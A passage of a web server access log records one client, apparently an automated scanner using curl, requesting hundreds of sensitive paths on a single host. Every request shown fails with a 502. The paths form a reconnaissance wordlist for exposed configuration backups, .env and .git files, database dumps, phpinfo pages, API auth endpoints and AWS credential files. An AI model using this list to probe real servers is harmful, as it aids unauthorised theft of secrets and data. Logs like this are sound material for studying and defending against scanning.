web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:42 +0000] - - 502 - GET https terminal.profibot.hu "/wp-config.php.orig" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:42 +0000] - - 502 - GET https terminal.profibot.hu "/phpinfo.phtml" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:42 +0000] - - 502 - GET https terminal.profibot.hu "/%c0/" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:42 +0000] - - 502 - GET https terminal.profibot.hu "/configs/application.ini" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:42 +0000] - - 502 - GET https terminal.profibot.hu "/_profiler/empty/search/results" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:42 +0000] - - 502 - GET https terminal.profibot.hu "/api/v1" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:42 +0000] - - 502 - GET https terminal.profibot.hu "/api/service" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:42 +0000] - - 502 - GET https terminal.profibot.hu "/api/system/info" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:42 +0000] - - 502 - GET https terminal.profibot.hu "/api/gateway" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:42 +0000] - - 502 - GET https terminal.profibot.hu "/api/command" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:42 +0000] - - 502 - GET https terminal.profibot.hu "/api/admin/user" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:42 +0000] - - 502 - GET https terminal.profibot.hu "/api/admin/user/password" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:42 +0000] - - 502 - GET https terminal.profibot.hu "/api/admin/user/status" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:42 +0000] - - 502 - GET https terminal.profibot.hu "/api/admin/auth" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:42 +0000] - - 502 - GET https terminal.profibot.hu "/api/admin/role" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:42 +0000] - - 502 - GET https terminal.profibot.hu "/api/admin/role/id" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:42 +0000] - - 502 - GET https terminal.profibot.hu "/api/admin" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:42 +0000] - - 502 - GET https terminal.profibot.hu "/api/v1/sms-sender" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:42 +0000] - - 502 - GET https terminal.profibot.hu "/api/v1/finchat/contact/manager" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:42 +0000] - - 502 - GET https terminal.profibot.hu "/api/v1/finchat/privilege-api/forwarder" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:43 +0000] - - 502 - GET https terminal.profibot.hu "/api/v1/finchat/privilege-api/forwarder/event" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:43 +0000] - - 502 - GET https terminal.profibot.hu "/api/v1/finchat/open-api" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:43 +0000] - - 502 - GET https terminal.profibot.hu "/api/upload" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:43 +0000] - - 502 - GET https terminal.profibot.hu "/api/savefile" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:43 +0000] - - 502 - GET https terminal.profibot.hu "/api/v1/files" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:43 +0000] - - 502 - GET https terminal.profibot.hu "/api/files.remote.share" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:43 +0000] - - 502 - GET https terminal.profibot.hu "/api/v1/netdisk/download" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:43 +0000] - - 502 - GET https terminal.profibot.hu "/sources/api/.env" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:43 +0000] - - 502 - GET https terminal.profibot.hu "/app/api/bzycs.php" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:43 +0000] - - 502 - GET https terminal.profibot.hu "/src/api/config.js" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:43 +0000] - - 502 - GET https terminal.profibot.hu "/web/api/config.js" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:43 +0000] - - 502 - GET https terminal.profibot.hu "/api/.git/config" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:43 +0000] - - 502 - GET https terminal.profibot.hu "/api/v1/finchat/open-api/auth/token" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:43 +0000] - - 502 - GET https terminal.profibot.hu "/api/v1/account/oauth/token" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:43 +0000] - - 502 - GET https terminal.profibot.hu "/api/v1/account/oauth/ticket" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:43 +0000] - - 502 - GET https terminal.profibot.hu "/api/v1/tokens" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:43 +0000] - - 502 - GET https terminal.profibot.hu "/api/login" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:43 +0000] - - 502 - GET https terminal.profibot.hu "/api/auth" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:43 +0000] - - 502 - GET https terminal.profibot.hu "/api/authentication" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:43 +0000] - - 502 - GET https terminal.profibot.hu "/api/auth/v1/pin/verify" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:43 +0000] - - 502 - GET https terminal.profibot.hu "/api/register" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:43 +0000] - - 502 - GET https terminal.profibot.hu "/api/resetpassword" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:43 +0000] - - 502 - GET https terminal.profibot.hu "/vendor/drupal/coder/.git/info/refs" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:43 +0000] - - 502 - GET https terminal.profibot.hu "/vendor/drupal/coder/.git/info/exclude" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:43 +0000] - - 502 - GET https terminal.profibot.hu "/vendor/drupal/coder/.git/objects/info" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:43 +0000] - - 502 - GET https terminal.profibot.hu "/vendor/drupal/coder/.git/objects/info/packs" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:43 +0000] - - 502 - GET https terminal.profibot.hu "/info.log" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:43 +0000] - - 502 - GET https terminal.profibot.hu "/info.txt" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:43 +0000] - - 502 - GET https terminal.profibot.hu "/member/space/company/info.txt" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:43 +0000] - - 502 - GET https terminal.profibot.hu "/cmsmessages/information.aspx" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:43 +0000] - - 502 - GET https terminal.profibot.hu "/cmsmessages/information.aspx.cs" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:43 +0000] - - 502 - GET https terminal.profibot.hu "/module/info/include/mysql/phpcms_info.sql" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:44 +0000] - - 502 - GET https terminal.profibot.hu "/phpinfo.bak" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:44 +0000] - - 502 - GET https terminal.profibot.hu "/phpinfo.dev" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:44 +0000] - - 502 - GET https terminal.profibot.hu "/phpinfo.test" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:44 +0000] - - 502 - GET https terminal.profibot.hu "/phpinfo-prod" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:44 +0000] - - 502 - GET https terminal.profibot.hu "/phpinfo-preprod" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:44 +0000] - - 502 - GET https terminal.profibot.hu "/phpinfo.staging" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:44 +0000] - - 502 - GET https terminal.profibot.hu "/phpinfo.stg" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:44 +0000] - - 502 - GET https terminal.profibot.hu "/phpinfo-server" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:44 +0000] - - 502 - GET https terminal.profibot.hu "/phpinfo-server.php" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:44 +0000] - - 502 - GET https terminal.profibot.hu "/phpinfo.srv" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:44 +0000] - - 502 - GET https terminal.profibot.hu "/phpinfo-api" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:44 +0000] - - 502 - GET https terminal.profibot.hu "/phpinfoapi" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:44 +0000] - - 502 - GET https terminal.profibot.hu "/phpinfo_details.php" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:44 +0000] - - 502 - GET https terminal.profibot.hu "/phpinfo_details" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:44 +0000] - - 502 - GET https terminal.profibot.hu "/phpinfomolten.php" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:44 +0000] - - 502 - GET https terminal.profibot.hu "/phpinfodev" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:44 +0000] - - 502 - GET https terminal.profibot.hu "/shop/phpinfo.php" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:44 +0000] - - 502 - GET https terminal.profibot.hu "/bitrix/admin/phpinfo.php" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:44 +0000] - - 502 - GET https terminal.profibot.hu "/mambo/administrator/phpinfo.php" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:44 +0000] - - 502 - GET https terminal.profibot.hu "/lib/zend/tool/framework/system/provider/phpinfo.php" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:44 +0000] - - 502 - GET https terminal.profibot.hu "/wp-content/plugins/phpinfo" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:44 +0000] - - 502 - GET https terminal.profibot.hu "/wp-content/.git/config" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:44 +0000] - - 502 - GET https terminal.profibot.hu "/blog/wp-content/themes/.git/config" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:44 +0000] - - 502 - GET https terminal.profibot.hu "/wp-content/themes/.git/config" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:44 +0000] - - 502 - GET https terminal.profibot.hu "/wp-content/plugins/.git/config" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:44 +0000] - - 502 - GET https terminal.profibot.hu "/wp-content/db.sql" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:44 +0000] - - 502 - GET https terminal.profibot.hu "/wp-content/mysql.sql" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:44 +0000] - - 502 - GET https terminal.profibot.hu "/wp-content/dump.sql" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:44 +0000] - - 502 - GET https terminal.profibot.hu "/wp-content/uploads/db.sql" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:44 +0000] - - 502 - GET https terminal.profibot.hu "/wp-content/uploads/mysql.sql" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:44 +0000] - - 502 - GET https terminal.profibot.hu "/wp-content/backup/db.sql" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:44 +0000] - - 502 - GET https terminal.profibot.hu "/wp-content/backups/db.sql" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:45 +0000] - - 502 - GET https terminal.profibot.hu "/wp-content/db_backup.sql" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:45 +0000] - - 502 - GET https terminal.profibot.hu "/wp-content/uploads/db_backup.sql" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:45 +0000] - - 502 - GET https terminal.profibot.hu "/wp-content/backup/db_backup.sql" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:45 +0000] - - 502 - GET https terminal.profibot.hu "/wp-content/fullbackup.sql" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:45 +0000] - - 502 - GET https terminal.profibot.hu "/wp-content/fullwebsite.sql" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:45 +0000] - - 502 - GET https terminal.profibot.hu "/wp-content/data.sql" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:45 +0000] - - 502 - GET https terminal.profibot.hu "/wp-content/backup/data.sql" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:45 +0000] - - 502 - GET https terminal.profibot.hu "/wp-content/uploads/data.sql" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:45 +0000] - - 502 - GET https terminal.profibot.hu "/wp-content/backups/data.sql" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:45 +0000] - - 502 - GET https terminal.profibot.hu "/wp-content/backup/database.sql" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:45 +0000] - - 502 - GET https terminal.profibot.hu "/wp-content/backups/database.sql" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:45 +0000] - - 502 - GET https terminal.profibot.hu "/wp-content/wordpress.sql" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:45 +0000] - - 502 - GET https terminal.profibot.hu "/wp-content/backups/wordpress.sql" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:45 +0000] - - 502 - GET https terminal.profibot.hu "/wp-content/dbdump.sql" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:45 +0000] - - 502 - GET https terminal.profibot.hu "/wp-content/uploads/dbdump.sql" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:45 +0000] - - 502 - GET https terminal.profibot.hu "/wp-content/backups/dbdump.sql" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:45 +0000] - - 502 - GET https terminal.profibot.hu "/wp-content/backup/dbdump.sql" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:45 +0000] - - 502 - GET https terminal.profibot.hu "/wp-config.bak" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:45 +0000] - - 502 - GET https terminal.profibot.hu "/wp-config-sample.php.bak" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:45 +0000] - - 502 - GET https terminal.profibot.hu "/wp-config.php.bak1" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:45 +0000] - - 502 - GET https terminal.profibot.hu "/wp-config.bak1" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:45 +0000] - - 502 - GET https terminal.profibot.hu "/config.inc.php.bak" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:45 +0000] - - 502 - GET https terminal.profibot.hu "/connect.php.bak" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:45 +0000] - - 502 - GET https terminal.profibot.hu "/connection.php.bak" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:45 +0000] - - 502 - GET https terminal.profibot.hu "/conn.php.bak" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:45 +0000] - - 502 - GET https terminal.profibot.hu "/conn.asp.bak" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:45 +0000] - - 502 - GET https terminal.profibot.hu "/connection.asp.bak" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:45 +0000] - - 502 - GET https terminal.profibot.hu "/config.jsp.bak" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:45 +0000] - - 502 - GET https terminal.profibot.hu "/config.ini.bak" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:45 +0000] - - 502 - GET https terminal.profibot.hu "/config/config.inc.php.bak" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:45 +0000] - - 502 - GET https terminal.profibot.hu "/config/config_ucenter.php.bak" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:45 +0000] - - 502 - GET https terminal.profibot.hu "/config/config_global.php.bak" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:45 +0000] - - 502 - GET https terminal.profibot.hu "/bitrix/php_interface/dbconn.php.bak" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:46 +0000] - - 502 - GET https terminal.profibot.hu "/uc_server/data/config.inc.php.bak" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:46 +0000] - - 502 - GET https terminal.profibot.hu "/data/config.inc.php.bak" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:46 +0000] - - 502 - GET https terminal.profibot.hu "/var/debug.log" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:46 +0000] - - 502 - GET https terminal.profibot.hu "/content/debug.log" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:46 +0000] - - 502 - GET https terminal.profibot.hu "/npm-debug.log" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:46 +0000] - - 502 - GET https terminal.profibot.hu "/yarn-debug.log" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:46 +0000] - - 502 - GET https terminal.profibot.hu "/firebase-debug.log" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:46 +0000] - - 502 - GET https terminal.profibot.hu "/debug.txt" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:46 +0000] - - 502 - GET https terminal.profibot.hu "/debug.txt.gz" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:46 +0000] - - 502 - GET https terminal.profibot.hu "/debug.tar.gz" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:46 +0000] - - 502 - GET https terminal.profibot.hu "/debug.zip" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:46 +0000] - - 502 - GET https terminal.profibot.hu "/debug.sql" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:46 +0000] - - 502 - GET https terminal.profibot.hu "/debug.sql.tar.gz" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:46 +0000] - - 502 - GET https terminal.profibot.hu "/debug.sql.zip" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:46 +0000] - - 502 - GET https terminal.profibot.hu "/mysql_debug.sql" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:46 +0000] - - 502 - GET https terminal.profibot.hu "/root/.aws/credentials" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:46 +0000] - - 502 - GET https terminal.profibot.hu "/.aws/secret_access_key.txt" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:46 +0000] - - 502 - GET https terminal.profibot.hu "/.aws/s3/config.json" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:46 +0000] - - 502 - GET https terminal.profibot.hu "/.aws/config.yaml" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:46 +0000] - - 502 - GET https terminal.profibot.hu "/.aws/secrets/" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:46 +0000] - - 502 - GET https terminal.profibot.hu "/.aws/secretsmanager/" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:46 +0000] - - 502 - GET https terminal.profibot.hu "/config.php.old" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:46 +0000] - - 502 - GET https terminal.profibot.hu "/config.inc.php" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:46 +0000] - - 502 - GET https terminal.profibot.hu "/config.json.bak" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:46 +0000] - - 502 - GET https terminal.profibot.hu "/config.yml" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:46 +0000] - - 502 - GET https terminal.profibot.hu "/config.js.bak" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:46 +0000] - - 502 - GET https terminal.profibot.hu "/config/settings.local.yml" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:46 +0000] - - 502 - GET https terminal.profibot.hu "/config.local" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:46 +0000] - - 502 - GET https terminal.profibot.hu "/config.local.php_old" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to 